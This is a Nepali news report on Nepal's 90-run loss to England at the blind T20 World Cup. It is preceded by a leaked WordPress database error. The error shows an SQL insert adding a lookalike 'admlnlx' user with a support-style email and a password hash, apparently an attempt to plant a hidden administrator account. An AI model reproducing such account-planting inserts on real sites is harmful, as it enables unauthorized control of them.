WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7I17YDfhzQPKmiRBN7REVmv6XUG7A/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:05:46', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २५ –
भारतमा जारी दोस्रो नेत्रहिन टि–ट्वान्टी विश्वकप क्रिकेटमा नेपाली नेत्रहीन क्रिकेट टोली इंग्ल्यान्डसगँ पराजित भएको छ । मंगलबार भएको खेलमा नेपाल टेस्ट मान्यता राष्ट्र इंग्ल्यान्डसगँ ९० रनले पराजित भएको हो ।
कर्नाटक स्टेट क्रिकेट एसोसिएसनको मैदानमा इंग्ल्यान्डले दिएको २३४ रनको लक्ष्य पछ्याएको नेपालले निर्धारित २० ओभरमा ७ विकेट गुमाएर मात्र १४३ रन बनाउन सक्यो । नेपालका लागि सुनिल सुवेदी क्षेत्रिले ४२ तथा सुनील थापा मगरले ३० रन जोडे । त्यस्तै कप्तान कृतन श्रेष्ठ दवालले २७ रन बनाए । इंग्ल्यान्डका जस्टिन होलिङवर्थले दुई विकेट लिए ।
यसअघि टस जितेर पहिले ब्याटिङ गरेको इंग्ल्यान्डले निर्धारित २० ओभरमा ५ विकेट गुमाएर २३३ रनको योगफल बनाएको थियो । इंग्ल्यान्डको लागि जासन स्मिथले शतकिय पारी खेल्दै १०० रन बनाए । त्यस्तै पिटर ब्लुइँटले ६० तथा जस्टिन होलिङवर्थले १६ रन जोडे । नेपालका पदमबहादुर बडैलाले दुई तथा सुनिल थापा मगरले १ विकेट लिए ।
प्रतियोगितामा नेपालको यो छैटौं हार हो । यसअघि नेपाल अष्ट्रेलिया, बंगलादेश,पाकिस्तान, वेष्ट इन्डिज र श्रीलंकासँग पराजित भएको थियो भने दक्षिण अफ्रिकालाई हराएको थियो । अब नेपालले बुधबार आयोजक भारतको सामना गर्नेछ ।
प्रतियोगितामा नेपालसहित टेस्ट मान्यता प्राप्त राष्ट्र भारत, दक्षिण अफ्रिका, अष्ट्रेलिया, बंगलादेश, पाकिस्तान, वेस्ट इन्डिज, श्रीलका, न्युजिल्यान्ड र इंग्ल्यान्ड छन् ।